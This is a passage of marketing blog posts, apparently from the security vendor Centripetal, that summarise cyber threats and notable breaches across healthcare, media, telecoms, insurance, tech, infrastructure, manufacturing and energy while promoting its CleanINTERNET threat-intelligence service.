the COVID-19 pandemic, as the workforce are either working remotely or on the frontline – in both cases, employees are unable to verify if requests or suspicious links are a threat as quickly or as effectively. As a result, 88% of healthcare workers have opened a phishing email at some point, giving hackers a much better chance of exfiltrating credentials and personal data to steal or hold to ransom. Healthcare cyber risks identified by CleanINTERNET Centripetal’s experience conducting a Proof of Value (POV) for a healthcare provider in 2019 revealed targeted botnet attacks on remote access, IoT, vulnerable software, web applications, email, and more. Our solution, CleanINTERNET, also identified multiple TOR sessions from enterprise systems, compromised systems due to phishing link clicks, and compromised hosts internally, that were observed to be a source of data exfiltration. Preventing these attacks means employing an intelligence-driven cyber solution that detects and shields incoming threats in near real-time. CleanINTERNET prevents attacks like phishing and ransomware from escalating by creating a Zero Trust environment, aggregating thousands of separate cyber threat feeds to proactively shield businesses from 99% of known cyber threats. Our solution creates tangible business value for healthcare organizations as our SOC team act as extension of your own security team, helping to narrow the skills gap, remove the burden from business internal teams, and enabling compliance to regulations like HIPAA and PCI DSS. Safeguard your employees, partners, stakeholder, and patients by boosting your cybersecurity posture with CleanINTERNET. Find out more about CleanINTERNET’s benefits within the healthcare sector by speaking to one of the Centripetal team. --- ### [Centripetal’s 2021 Roundup – Data Breaches and Key Cyber Trends](https://www.centripetal.ai/blog/centripetals-2021-roundup-major-breaches-and-key-cyber-trends) Published: 2021-12-20 Summary: Take a look at some of the key cyber trends that have emerged, or worsened since 2021 as a result of high profile data breaches. This year saw publicly reported data breaches and cyber attack attempts soar, stretching cyber teams to their limit and increasing recovery-related costs to unsustainable levels. By the end of September 2021, the number of data breaches in the US had already succeeded the total number of events in 2020 by 17%, with reputational and financial damage rippling through organizations in all industries. The US was also the top country in the world for data breach costs in 2021, with an average cost of $9.05 million per breach. High-profile data breaches In 2021 many businesses were still reeling from the SolarWinds breach – or the Sunburst attack – that was discovered in December 2020. The campaign, believed to be a Russian espionage attempt, resulted in the compromise of over 100 companies, 20% of which were US government agencies, with the remaining 80% being private corporations in a variety of industries, including Cisco, Intel, Deloitte, and Microsoft. The scale of the SolarWinds breach meant that the fallout was still being felt throughout the year, and the attack was seen by many as a wake-up call to how damaging supply chain attacks can be. The attackers responsible for the breach didn’t rest on their laurels in 2021: Nobelium has continued to target companies around the world for espionage, launching phishing attacks, infiltrating email accounts, and attacking resellers and cloud service providers in the hope of compromising the tech supply chain. Other high-profile incidents in this past year include an attack on JBS Foods, one of the biggest meat processing companies in the world, which resulted in one of the largest ransomware payments of all time, the hack of Microsoft Exchange servers, and the theft of 700 million LinkedIn users’ data. But of all the cyber attacks in 2021, the ransomware attack on the Colonial Pipeline in late April had the most news coverage; As a key part of critical national infrastructure in the US, the attack disrupted gas supplies along the entire East Coast, causing chaos and mass panic until the ransom of $4.4 million was paid. Attacks like these point to a variety of trends that have emerged, or worsened, in 2021. Here are some of the latest key cyber trends. 1. The remote working revolution. The strict COVID-19 lockdowns of 2020 have inspired a change among the workforce, with 85% of managers believing remote work to be the new norm post-pandemic. The blurring of the lines between personal and professional life can increase the risk that sensitive information will fall into the wrong hands, particularly when home offices lack the firewalls, routers, and access management available in the office. 2. IoT adoption and the evolution of tech. The expansion of the Internet of Things (IoT) in devices like smart watches, voice assistants, and sensors will continue to create more opportunities for cyber attacks as malicious actors find themselves with far more potential entry points. IoT devices also have fewer processing and storage capabilities, making them harder to safeguard. 3. Ransomware attacks are increasing. The frequency of ransomware attacks has increased dramatically, with 93% more carried out in the first half of 2021 than the same period in 2020. Hackers are employing more sophisticated techniques to hold data hostage, often using machine learning and demanding payment through cryptocurrencies, making it harder to trace. 4. Data privacy frameworks are becoming more stringent. Numerous data breaches, like those targeted at LinkedIn, Socialarks, and Twitch this year, have led to the exposure of millions of PII records. In the face of tightening and increasing regulations, organizations need to put more effort into their compliance efforts, focusing on multi-factor authentication, encryption, and access control. 5. The security skills gap is overwhelming security teams. The cybersecurity skills gap continues to persist within most businesses, with security professionals claiming that heavier workloads, unfilled positions, and burnout are to blame for worsening the gap in cybersecurity skills. The need for real-time visibility One sign of progress during 2021 came through an Executive Order from the White House in May, which addressed the need for federal government agencies to generate guidelines, conduct evaluations, and implement improvements in their cybersecurity, as well as urging that the private sector follow suit. The only way for these organizations to prevent data loss and protect their customers, and therefore their reputation, is to have visibility of their data in real-time. Our cyber threat intelligence solution, CleanINTERNET, delivers this visibility at scale. CleanINTERNET uses AI to identify new cyber threats as they develop, aggregating and analyzing over 3,000 global threat feeds to automatically shield 99% of known attacks in real-time. This removes the burden from your internal security team, saves you millions on separate threat feeds, and ultimately means you never need to choose between security for your customers and your own network performance. Throughout 2021, we’ve focused on how our solution caters to over 15 different sectors, from Healthcare to Legal, Government, and Gambling. Check out all our sector-specific blogs here to see how your business can benefit from CleanINTERNET, no matter what your unique challenges are. Get in touch with the Centripetal team for more information on our work in your sector, and we’ll see you in 2022! --- ### [The Risks of Cyber Attacks in Entertainment and Media](https://www.centripetal.ai/blog/cyber-attacks-in-entertainment-and-media-what-are-the-risks) Published: 2021-12-14 Summary: Whether intended to steal information, hold content to ransom, cyber attacks in entertainment and media are taking their toll. The entertainment industry is a profit powerhouse, with revenues now over $2 trillion worldwide. Unfortunately, the industry’s high-profile content, reliance on digital systems, and growing supply chain of partners make the entertainment sector an attractive target for cyber attacks. Whether intended to steal consumer information, hold content to ransom, or distribute propaganda, data breaches are taking their toll on the industry. In 2020, almost half of firms in the sector reported at least one incident, and took an average of 224 days to identify a data breach, two weeks longer than the global average. Valuable content leaks Content is an entertainment or media company’s most valuable asset, meaning the industry is a goldmine of data and intellectual property that can be monetized. Whether targeted by hackers chasing monetary gain or nation-state actors causing deliberate disruption, extortionists can hold materials for ransom, or steal data and threaten to leak it in the case of non-payment. In early 2021, the German Funke Media Group fell victim to an attack like this, with a ransomware attack holding data hostage on more than 6,000 enterprise computers. The cyber attack on Funke Media Group is not an isolated incident. In 2017, a hacking group leaked 10 unreleased episodes of Netflix’s Orange Is the New Black – despite receiving a $50,000 Bitcoin ransom payment – mirroring a very similar attack on HBO that same year. More recently, A-list celebrities including Lady Gaga, Robert DeNiro, and Madonna were affected when their media and entertainment law firm was hit by ransomware which released up to 756 GB of stolen data. This included confidential contracts, emails, phone numbers, and other sensitive data. Along with the high-value data they hold, the sheer size of entertainment conglomerates’ budgets makes them attractive targets for cyber criminals, who are empowered to demand larger ransoms. The entertainment industry generates more than $100 billion in annual revenues, so a lot of profit is at stake. While large organizations seem to be the obvious targets, small post-production companies, visual effects houses, and creative agencies also face the threat of serious cyber attacks. And unlike the bigger studios, they rarely have full-time IT or security staff, with little, if any, budget allocated to cyber awareness and training. Third-party threats Media production models often involve various third-party contractors, including camera operating, editing, writing, stunts, graphic design, and distribution teams. This decentralized supply chain introduces further security challenges; in the instance that a vendor suffers a breach, the organization’s data could be compromised. An investigation found that the aforementioned breach and data leak involving Netflix’s Orange Is the New Black occurred due to the compromising of a contractor working on the show. To protect their systems, entertainment organizations, no matter their size, need a centralized security strategy among their network of partners. An evolving industry The entertainment industry is constantly shifting, with the COVID-19 pandemic causing a surge in the usage of streaming services, online gaming, and virtual reality. The increased consumption of digital content, often through network-based and IoT devices like Smart TVs and virtual home assistants, further increases the risk of hacking and its potential damage, with customers inputting more personal information and payment details into their entertainment systems than ever before. These devices rely heavily on cloud-based systems and mobile networks, so interruptions in service caused by a cyber attack can degrade a company’s brand reputation and cause huge losses in revenue. An Amazon Web Services outage in November 2021 is estimated to have cost the company $100 million in revenue, and with 87% of consumers now willing to take their business elsewhere if a data breach occurs, revenue lost from defecting customers is also significant. In this landscape, regulations like the GDPR, CCPA, and PCI SSF are especially important. Organizations must demonstrate compliance with these standards without redeploying staff from security initiatives. Leveraging cyber threat intelligence The key to keeping customers and reputations safe in the entertainment industry is to leverage intelligence gleaned from cyber threats to detect and prevent future breaches, ensuring that all partners and suppliers are integrated into their cybersecurity strategy. Centripetal CleanINTERNET is an innovative, next-generation threat intelligence solution providing enterprise-class security to entertainment organizations of all sizes. CleanINTERNET works at massive scale to help overstretched and outmanned security teams shield against 99% of globally identified cyber threats. Our team of expert analysts aggregate, correlate, and manage over 3,000 cyber threat feeds, using AI to identify developing threats and reporting back to you directly, alleviating the security burden from your team and reducing security alerts by up to 70%. CleanINTERNET is scalable and easily deployable, addressing industry and regulatory compliance requirements in the process. Centripetal’s Zero Trust inspection of threat traffic separates real threats from legitimate business traffic, so you no longer need to choose between full cyber protection and business performance. Find out more about the CleanINTERNET solution and its capabilities within the entertainment sector by speaking with the Centripetal sales team. --- ### [Cybersecurity for Telecommunications](https://www.centripetal.ai/blog/cybersecurity-for-telecommunications-outsourcing-and-increasing-cyber-posture) Published: 2021-12-01 Summary: Last week, the US government warned hospitals and healthcare providers of an increased and imminent ransomware threat, linked directly to Eastern ... Outsourcing and Increasing Cyber Posture The telecommunications industry connects us with each other, but with their vast infrastructure, and customer bases often in their millions, these companies offer a wealth of potential entry points for attackers to exploit. Almost half of telecommunications organizations suffered from DNS-based malware in 2019 alone, yet the majority (81%) waited at least three days to apply patches once notified of a breach. And with the roll out of 5G exacerbating potential breaches, service providers need to be ready to protect customer data and themselves as they innovate. Telecom operators and MSSPs like AT&T, Verizon, and T-Mobile are transitioning from network to cloud service companies to streamline their business operations, store and distribute their content, and roll out new applications. IoT adoption has also increased due to its use in connected mobile devices, creating more entry points for hackers to exploit and leaving users, clients, and companies exposed. And telecom firms have done little to prevent this, with only 45% deploying a mobile device security strategy. Typical threats targeting telecoms The telecommunications industry is being targeted on two fronts: from direct attacks intended to breach their organization, and indirect threats intended to breach their customers or subscribers. In the first quarter of 2021, the telecommunications industry was the most targeted by distributed denial of service (DDoS) attacks – a significant jump from the previous year. In June 2021, a cyber attack now believed to be the largest ever launched on North American telecom operators caused cell phone network disruption in multiple states. The cost of DNS-based attacks like DDoS, Distributed Reflection Denial of Service (DRDoS), and cache poisoning are surging. System downtime, recovery costs, and legal fees add up; a DNS attack costs telcos an average of US$886,560. Another recently identified threat comes from malicious hacking group LightBasin, which has been “consistently targeting the telecommunications sector at a global scale since at least 2016 … to retrieve highly specific information from mobile communication infrastructure." The custom tools that the threat actor uses enables LightBasin to collect text messages, call information, and a whole host of other personal data that allows targeted individuals to be monitored and tracked with great accuracy. At least 13 telecommunications companies have already been breached by LightBasin since 2019. Internal weaknesses can also be a threat to telecommunications firms’ security. Whether it’s through malicious man-in-the-middle attacks that use employees to help breach the perimeter, or a lack of employee cyber awareness making networks far more likely to be hit by phishing or social engineering attacks, internal weaknesses must be identified and addressed. Research has found that 74% of employees, including the C-Suite, working for Fortune 1000 telecom companies are reusing passwords across multiple work and personal accounts, making the job of hackers far easier in attacks such as credential stuffing. The compliance challenge As well as the threat of cyber attack, holding the types of data that the telecommunications industry does comes with unique legal obligations. Sensitive data such as PII and financial information are protected under data protection laws and international standards from GDPR in the EU, to the CCPA in California, APPI in Japan, and PCI DSS for payment data specifically. Failure to comply with these frameworks can lead to not just financial penalties, but severe reputational damage for organizations of all sizes. Outsourcing and increasing telcos’ cyber protection Centripetal CleanINTERNET delivers a fully managed, comprehensive cyber threat intelligence service for businesses of all sizes. Our scalable, easily deployable, and effortlessly implemented solution gives MSSPs, ISPs, and system integrators an unprecedented level of protection that filters threat traffic at scale. CleanINTERNET creates a Zero Trust environment by aggregating, correlating, and managing over 3,000 cyber threat feeds, using AI to identify potential new threats as they develop. Our team of expert analysts then report back to you directly, alleviating the burden on your team and reducing the amount of SIEM and firewall alerts by up to 70%. As well as enabling compliance with the relevant security frameworks, the solution saves millions that would be spent on multiple separate threat feeds. CleanINTERNET is architected to easily integrate into any MDR (Managed Detection and Response) program for added prevention capability and additional service offerings for MSSPs. Find out more about our work in the telecommunications industry and with MSSPs by chatting with a member of the Centripetal Sales team. --- ### [Cyber Risk in the Insurance Industry](https://www.centripetal.ai/blog/cyber-risk-in-the-insurance-industry) Published: 2021-11-17 Summary: The Insurance Industry is in the business of assuming and predicting risk, including cyber risk. Despite this, organisations are not prepared for cyber events. The Insurance Industry is in the business of assuming and predicting risk, including cyber risk. Despite this, less than half of insurance CEOs claim that their organization is fully prepared for a cyber event. The sheer amount of personal data they hold, the increasing use of third-party vendors, and the growing security skills gap have made it increasingly challenging to secure their systems against targeted attacks. Insurance providers now face an average of 113 targeted breach attempts every single year – a third of which are successful. An abundance of data When purchasing insurance, consumers and businesses are required to surrender contact information, financial information, and even health information to the insurance provider, all in the initial query phase. Consumers are often advised to shop around to find the best insurance deal, meaning their personal data is often shared with multiple insurance companies. The pressure to innovate systems and infrastructure only increases the amount of data that insurers need to hold. Modern-day consumers demand services all day every day via apps, customers want to streamline processes by filing claims digitally, and IoT-connected devices are employed by insurers to help measure consumers’ risk and detect fraudulent claims. All these systems continuously collect, hold, and use policy-holder data. This abundance of data makes insurance companies a major target for malicious actors, as well as making the consequences of a breach severe. A 2020 survey of insurance industry security professionals found that the protection of massive amounts of PII was the top security consideration for insurance companies. Internal and external threats The use of third-party vendors within the insurance industry is on the rise, with 88% of insurers and claim leaders now using a third-party provider for at least one component of their digital transformation. This can make organizations highly vulnerable to cyber threats, with hackers able to use malware to access data through a third party’s systems. In March 2020, Chubb, one of the largest property and casualty insurers in the US, became the target of a cyber attack that involved unauthorized access to data held by a third-party provider. No official details were disclosed, but security researchers believe that the firm was hit by a ransomware attack that breached both customer and employee data from Chubb. The cybersecurity skills gap within organizations is a huge threat to the insurance industry. The worldwide shortage of cyber professionals has left many businesses understaffed and undertrained in security essentials, increasing the likelihood of successful phishing and social engineering attacks on the organization. Health insurance provider Anthem suffered the biggest data breach in the history of healthcare when 78.8 million records were stolen in 2015. Hackers accessed this data through a spear-phishing campaign that manipulated employees into handing over data, eventually resulting in Anthem paying over $100 million in damages and legal settlements. Inadvertent disclosure of sensitive information also poses a security threat. The First American Financial Corp. incident in 2019 saw 800 million personal and financial records exposed on the insurer’s website. This sort of negligence not only puts an insurance company’s clients at risk but can also damage the business’ reputation, deterring potential customers and destroying the trust that existing customers have in the insurer. Reducing cyber risk for the insurance industry For the insurance industry to avoid the severe financial and reputational damage that follows a data breach, organizations need real-time analysis and threat monitoring, with cybersecurity baked into business systems and infrastructure. To ease the threat detection process for security staff who are already stretched thin, security solutions must be easily manageable, frictionless, and designed to avoid any performance degradation. Insurance firms also need to consider the huge number of cybersecurity standards and frameworks they are required to comply with, including the GDPR, CCPA, HIPAA, and NYDFS. Centripetal’s CleanINTERNET service creates a Zero Trust environment by applying advanced cyber threat intelligence. CleanINTERNET aggregates, correlates, and manages cyber threat intelligence from over 3,000 threat feeds and uses AI to identify potential new threats as they develop. By leveraging the expertise of the global threat intelligence community, CleanINTERNET alleviates the burden of cyber threats and reduces the amount of SIEM and firewall alerts that consume cybersecurity teams by up to 70%, allowing internal teams to focus on the unknown rather than the known. Centripetal’s Zero Trust inspection of threat traffic provides an elevated standard of cyber protection to businesses of all sizes, all while enabling compliance with the relevant security frameworks and saving millions that would be spent on multiple separate threat feeds. Get in touch with the Centripetal team to find out more about our work in the insurance industry and how CleanINTERNET can benefit your organization. --- ### [CleanINTERNET for the Tech Industry](https://www.centripetal.ai/blog/cleaninternet-for-the-tech-industry) Published: 2021-11-05 Summary: Cyber attacks on the tech industry have been so detrimental that at a White House summit in 2021, several Big Tech companies made commitments to… They may operate in countless sectors, but tech organizations have one thing in common: as leaders in innovation and holders of large amounts of customer information, including sensitive government data, security is crucial. But tech companies take an average of 187 days to identify a data breach, equating to a loss of between 10 and 99 million records per incident for large organizations. Cyber attacks on the tech sector have been so detrimental that at a White House summit in August 2021, several Big Tech companies made multibillion-dollar commitments to address security weaknesses and improve lackluster cyber defenses. The threat to technology There are many reasons why hackers would be motivated to target organizations that provide technology solutions. As a rapidly evolving industry, tech holds high-value future product plans, financial data, and customer information that can be sold or held for ransom. Intellectual property and proprietary information are capable of providing other companies with a significant competitive advantage, making them an attractive target for competitors or opposing threat groups. Tech companies also hold data belonging to all the companies they work with, which can include utility firms, healthcare organizations, and even government bodies. An attack on their systems could expose their clients to a similar fate. State-sponsored threat actors are also often interested in collecting intelligence from tech organizations to help them defeat the security countermeasures of other companies around the world, thereby enabling future data theft. The ever-growing cybersecurity skills gap is also a threat to the tech industry, with hackers often deliberately targeting smaller organizations that have fewer security professionals. Organizations across all industries are feeling the effects of the skills gap, with cybersecurity job openings now reaching over 500,000 in the US, up 18% from 2020. The tight labor market means that security teams are overstretched, undertrained, and overworked, with less time to focus on mitigating risks within their own organization. When hackers attack technology One of the latest and widest-reaching cyber attacks on the tech industry is the SolarWinds breach, identified in December 2020. The campaign used US tech company SolarWinds as a springboard to compromise a host of government agencies, as well as breaching thousands of tech companies including Cisco, Microsoft, Intel, Belkin, and VMware. US intelligence services state that Russia was likely responsible for the breach, which appeared to be an effort to collect intelligence rather than simply cause destruction. The same hacking group is now involved in a fresh wave of activity, compromising the networks of 14 technology service providers. In the same month as the SolarWinds breach, FireEye – one of the largest cybersecurity companies in the US – was hacked. An arsenal of red team tools were stolen in an attempt to wreck their effectiveness, and the hackers also appeared to be interested in FireEye’s government agency customers. Attacks have continued into 2021, with software company Kaseya hit by “the worst ransomware attack to date”, affecting at least 200 organizations globally, and a data breach exposing the personal information of over 500 million Facebook users, scraped because of a vulnerability in 2019. Suffering a cyber attack can lead to severe reputational damage among customers, particularly if an organization provides cybersecurity solutions and therefore should be trusted with the detection and prevention of cyber attacks. The reputational repercussions of a data breach can be as damaging as fines or breach recovery costs, with the vast majority (87%) of customers willing to take their business elsewhere. And for small or medium-sized enterprises for whom competition is fierce, a damaged reputation can be a blow from which the business might never recover. Threat intelligence for tech organizations With many vendors focused on their clients’ technology rather than their own, simple and effective threat detection tools are a must. Cyber threat intelligence can offer businesses an overarching view of cyber risks, but these organizations can struggle to manage and leverage this intelligence for themselves. Centripetal provides organizations with Zero Trust inspection of all threat traffic, powered by proactive intelligence. Our solution, CleanINTERNET, aggregates a growing base of over 3,500 cyber threat intelligence feeds, using dynamic cyber threat intelligence to analyze and shield threats on your behalf, and delivering comprehensive findings to you via our team of expert threat analysts. These analysts help to bridge the security skills gap and alleviate the burden on internal teams. The CleanINTERNET solution dramatically increases your cybersecurity posture and helps prevent network infiltration and data exfiltration, providing technology businesses of all sizes with the enterprise-class intelligence and Zero Trust inspection they need to protect their reputation and secure the sensitive data they hold. Find out more about the CleanINTERNET solution and its work in the technology sector by getting in touch with our team. --- ### [What Is Zero Trust and How Does CleanINTERNET Apply It?](https://www.centripetal.ai/blog/what-is-zero-trust-and-how-does-cleaninternet-apply-it) Published: 2021-10-14 Summary: Zero Trust is the latest buzzword in cybersecurity, with the federal government adopting it as their next-generation security model. In May 2021, following an influx of high-profile data breaches and nation-state cyber threats, including the SolarWinds and Colonial Pipeline attacks, the US federal government released an executive order on improving the nation’s cybersecurity. The order urged federal agencies and contractors to strengthen their cybersecurity defenses by implementing a Zero Trust model,and strongly recommended that the private sector follow suit. But what is Zero Trust and why does it matter? What is Zero Trust? Zero Trust is the latest buzzword in cybersecurity, with large technology companies and the federal government adopting it as their next-generation security model. Popularized by John Kindervag, an industry analyst at Forrester, the concept centers on the belief that trust is a vulnerability, and security frameworks must be designed with the strategy “Never trust, always verify.” Rather than being an individual tool or a platform, Zero Trust is a security framework – moving away from the traditional perimeter-based approach and always “assuming breach.” Zero Trust means trust no one, not even users behind the firewall, as insider threats now make up 60% of data breaches. Zero Trust assumes that every attempt to access your network is a threat until confirmed otherwise, adopting a "least privilege" access and inspecting, as well as logging, every single network call, file access, and email. While traditional or perimeter network security focuses on building multiple layers of security to keep attackers out, Zero Trust calls for organizations to understand who every user is and what endpoint they’re coming from. It assumes the network has been compromised and challenges the user to prove they’re not an attacker. To do this, Zero Trust draws on technologies like multi-factor authentication, IAM, orchestration, analytics, encryption, scoring, and file system permissions. Why does it matter? By adopting a Zero Trust mindset, businesses increase their capability to detect phishing emails, data exfiltration, credential stuffing, password theft, and other methods, stopping attackers before intrusion occurs. They also gain visibility into users, devices, and workloads across their environment, reducing the risk of cloud and container deployment and improving governance and compliance. By maintaining control across a network, Zero Trust helps to set policy rules which can be automatically updated based on identified risks, which ultimately saves valuable business time and reduces architectural complexity. However, embracing Zero Trust means adjusting business mindsets. Most IT experts have been trained to implicitly trust their own environments and firewall; Zero Trust begins with un-learning this. This change can be a challenge for security teams — and working with legacy and existing environments only further complicates implementation. To ease the transition, organizations have to integrate the Zero Trust mindset into all aspects of their infrastructure and their digital transformation strategy. How Centripetal delivers Zero Trust Centripetal’s cyber threat intelligence solution, CleanINTERNET, implements Zero Trust by shielding known threats coming in and out of your network. We do this by leveraging proactive intelligence from over 3,500 cyber threat feeds, performing in-depth threat analysis and shielding on your business’ behalf. CleanINTERNET’s Zero Trust approach to threat detection and inspection protects your business from network infiltration and data exfiltration. Our team of expert cyber threat analysts install and manage the service for you, delivering comprehensive, relevant threat findings to you directly and alleviating the burden of implementation and maintenance from your security staff. Our fully managed solution eliminates any worry over changing mindsets within your business and saves millions of dollars on separate threat feeds. CleanINTERNET offers enterprise-class protection and Zero Trust to organizations of all sizes. Find out more about the CleanINTERNET solution and its Zero Trust capabilities by getting in touch with our team. --- ### [Protecting Critical National Infrastructure with Zero Trust](https://www.centripetal.ai/blog/critical-national-infrastructure-cyber-threats) Published: 2021-09-28 Summary: 86% of Critical National Infrastructure organizations detected cyber attacks on their environments in 2020. Critical National Infrastructure (CNI) is essential to the public’s health and safety – but its networks are under attack. 90% of critical infrastructure providers in the US, UK, Germany, Australia, Mexico, and Japan have fallen victim to a cyber attack in the past two years, with growing automation and digitalization only increasing attack surfaces. In many cases, these attacks are thought to be the work of other nation-state actors rather than individual hackers or hacker groups, with motives including industrial espionage from competitors, ransom, and other financial drivers. When critical data ends up in these hands, the financial and reputational damage to the organization can be devastating. Sophisticated attacks like phishing, malware, data exfiltration, cyber espionage, and Distributed Denial of Service (DDoS) can grant cyber criminals access to CNI networks, where they can take control of and disrupt operational systems or exfiltrate sensitive data. Malicious or inadvertent data leaks caused by insider sources are also on the rise, with six in ten breaches coming from insiders in 2020 –  a 47% increase from 2018. Why is CNI so vulnerable? 86% of Critical National Infrastructure organizations detected cyber attacks on their OT/ICS environments in 2020, despite 78% feeling ‘confident’ that their OT is protected from cyber threats. The demand for IoT devices and the convergence of critical OT with IT networks provide greater attack potential for hackers, with decades-old industrial control systems lacking suitable authentication or encryption. In addition to this, a large portion of US Critical National Infrastructure is owned by the private sector, meaning that cybersecurity is often less of a priority than maximizing corporate profits. Critical utilities sectors are currently not required by law to disclose when they have been hacked, and many others choose not to for fear of reputational damage. These communication gaps in CNI mean that information about the scale and severity of threats is hard to come by, and organizations are often clueless about potential cyber threats to their infrastructure. The reality of CNI threats The effects of these cybersecurity vulnerabilities are experienced by CNI infrastructure across the globe. In May 2020, one of Iran’s central ports was severely disrupted due to a cyber attack – allegedly in retaliation to an Iranian attempt to attack water facilities in Israel two weeks earlier. While no major damage was done, Israel’s decision to hit back by carrying out another attack on a critical network demonstrates how seriously nations take cyber threats to their Critical National Infrastructure. A few months later in February 2021, hackers attacked a water treatment plant in Florida in an attempt to raise the amount of sodium hydroxide in the water to toxic levels. An employee was able to prevent the contamination, but without this one worker’s intervention, Floridians would have been at risk of serious health issues. CNI organizations globally are still recovering from the SolarWinds attacks in late 2020, wherein Russian government-backed hackers spread malicious code to 18,000 organizations. At least nine federal departments and over 100 organizations including energy firms, transportation companies, and laboratories were compromised. Even relatively unsophisticated threats, like the ransomware attack on the Colonial Pipeline fuel supply, can paralyze infrastructure by disrupting the enterprise network. With attacks escalating, the US National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) recently issued an alert recommending that critical infrastructure operators in the US take immediate action to prevent malicious cyber activity. This is a call to action for nations and organizations alike – critical national infrastructure needs major cybersecurity investment if we’re to protect the nation’s economy and security. The future of cybersecurity in CNI Securing critical national infrastructure is essential to the public’s health and safety. Organizations need to embrace a Zero Trust mindset, investing in resilience and embracing digitalization rather than just patching up OT systems to make them secure. This means closing the visibility gap when it comes to cyber threats. Centripetal’s Zero Trust cyber threat intelligence solution, CleanINTERNET, offers Critical National Infrastructure real-time visibility into potential cyber threats. One of the most effective ways of creating Zero Trust is to leverage CTI data on emerging threats is with cyber threat intelligence feeds. CleanINTERNET aggregates, manages, and delivers thousands of cyber threat intelligence feeds directly to you, only reporting what is relevant to your business. This allows security teams to better understand their risk profile and respond to any emerging threats. CleanINTERNET provides vital data on how an attack has evolved, allowing for appropriate and timely responses while simplifying the security team’s workflow. With CleanINTERNET, our cyber threat analysts act as an extension of your team, alleviating the burden on existing security staff and providing strategic intelligence at a fraction of the cost of multiple, disparate threat feeds. The Centripetal team provides personalized support from day one, working with you from implementation onwards to simplify cyber threat intelligence. Digitalize safely and minimize the financial and reputational costs of cyber attacks with CleanINTERNET. Get in touch with our team for more information on cyber threat intelligence for critical national infrastructure. Check out the previous blogs in this series for more on the cyber challenges in the manufacturing, energy, and utilities industries. --- ### [Cybersecurity Solutions for the Manufacturing Sector](https://www.centripetal.ai/blog/implementing-cybersecurity-solutions-manufacturing-sector) Published: 2021-09-16 Summary: As manufacturing evolves, hackers and other cybersecurity actors are provided with many more access points to exploit the industry. As manufacturing evolves and more sites choose to adopt connected and smart technologies, (read more in our previous manufacturing blog), hackers and other bad actors are provided with many more access points to exploit. But despite risk being high, studies have found that a quarter of manufacturing organizations have not performed a cyber risk assessment in the past year. The challenge of maintaining production output levels while using legacy infrastructure, all during a cybersecurity talent shortage, is taking its toll on the manufacturing sector – risking production downtime, reputational damage, and severe financial loss. Aging infrastructure Aging, legacy systems are a huge threat to manufacturers’ cybersecurity. Instead of using Windows or Linux, operational environments often have more heterogeneous programs – some up to 40 years old – that have no security built in. A report by Trend Micro found that 4% of manufacturing companies were still using Windows XP in December 2019, over five years after Windows stopped supporting it. Older systems also have limited options for multi-factor authentication or encryption, making them much easier for malicious actors to target. But organizations often don’t have enough financial or human resources to upgrade these systems and applying patches can risk bringing the whole environment. Many manufacturers find themselves reliant on outdated assets for the control of integral parts of their operations; these issues are exacerbated by merger and acquisition activities, where acquired assets can bring their own legacy systems and hidden vulnerabilities. The talent shortage Finding, retaining, and developing security teams is critical for the manufacturing industry. 84% of executives agree that there is a skills shortage in the US manufacturing sector and finding professionals to maintain an adequate defense against cyber adversaries only adds to the complexity of this skills gap. Indeed, four of the top ten cyberthreats facing manufacturing are directly attributable to internal employees: phishing, direct abuse of IT systems, errors/omissions, and use of mobile devices. Whether caused unintentionally or deliberately, internal threats can spell disaster for manufacturing organizations of all sizes. A phishing attempts toward a German steel mill gave hackers access to several systems, allowing them to control plant equipment, cause massive physical damage to a blast furnace, and endanger the lives of plant workers. Additionally, ownership of enterprise cyber risk is often fragmented across an organization, with various departments and business units having different approaches to handling cyber risk. This leaves CISOs with limited visibility into the cyber risk landscape and limited ability to influence policies and remediation activities. Investing in cyber resilience The cost of a cybersecurity breach for a manufacturer is vast. Production downtime, scrap materials, IP theft, and reputational damage can be financially detrimental – not to mention the cost of ransomware attacks, of which manufacturing companies accounted for nearly a quarter of in 2020. To ease the transition from legacy systems, manufacturers need real-time threat detection that doesn’t strain existing teams or exacerbate the cybersecurity skills gap. Centripetal’s cyber threat intelligence solution, CleanINTERNET, offers greater visibility of IoT/OT/SCADA assets as well as cyber threats. We offer the manufacturing sector instant visibility across networks of all sizes, in a solution that is effortless to implement and maintain. CleanINTERNET utilizes a growing base of over 3,500 cyber threat intelligence feeds, using dynamic cyber threat intelligence to analyze and shield threats on your behalf, before delivering comprehensive, relevant findings to you via our team of expert threat analysts. Our analysts act as an extension of your team, alleviating the burden on your security team and helping to bridge the cybersecurity skills gap. The Centripetal team provides personalized support from implementation to maintenance, allowing you to focus on critical business activities without the added stress of cyber threats. CleanINTERNET saves millions of dollars on separate cyber threat intelligence feeds, providing businesses of all sizes with the in-depth, proactive threat intelligence they need to monitor the ever-changing threat landscape and secure their customers, clients, and reputation. Get in touch with our team for more information on simplifying cyber threat intelligence for the manufacturing industry. Stay tuned for our next blog exploring evolving cybersecurity threats within critical national infrastructure. --- ### [The Future of Cybersecurity in the Energy Sector](https://www.centripetal.ai/blog/cybersecurity-energy-sector) Published: 2021-08-27 Summary: Half of cyber professionals in the energy sector have reported suffering at least one breach causing an operational outage in the past year. This year’s ransomware attack on the Colonial Pipeline network shut down 45% of the fuel supplied to the US East Coast for six days, demonstrating the disruption that malicious actors can inflict on entire nations. With digital transformation, the development of supply chains, and the shift to renewable sources all expanding attack surfaces, over half of cyber professionals in the energy sector have reported suffering at least one breach causing data loss or an operational outage in the past 12 months. An expanding digital footprint Energy businesses have long been looking to boost productivity and increase profits by investing in digital transformation – collecting and analyzing data, connecting IoT devices, and implementing AI and automation solutions. When energy companies digitalize, it can facilitate up to a 10% improvement in production and a 30% improvement in cost. A decentralized, digitalized energy system is also an inevitable outcome of the clean energy transition. The shift to renewables is now a huge consideration for the energy sector as the US re-joins the Paris Climate Accord and works towards achieving net-zero carbon emissions by 2050. Today, renewable energy sources account for around one-fifth of total consumption and are likely to outstrip demand for oil by 2040. Adapting to wind, solar, and electric energy sources requires using more decentralized infrastructure. Wind and solar farms are often controlled and managed remotely from afar, while huge, interconnected electricity grids rely on automated controls to run efficiently. Though this provides energy organizations with the ability to optimize production in real-time based on supply and demand, these interconnected-but-dispersed networks dramatically increase the attack surface for malicious actors to exploit. Phishing emails containing malware or ransomware can be targeted at unsuspecting staff, DDoS attacks can see a perpetrator hack and take control of systems, and, particularly in remote managed renewables infrastructure, control can be exerted through public IP addresses, which leaves software open to attack. Energy companies can also be collateral damage from global attacks such as NotPetya and WannaCry in 2017. Supply chain risk The energy sector has a vast and complex supply chain ecosystem, and if one part of the chain is interrupted it can have consequences for all suppliers and customers involved. The Duke Energy attack in 2018 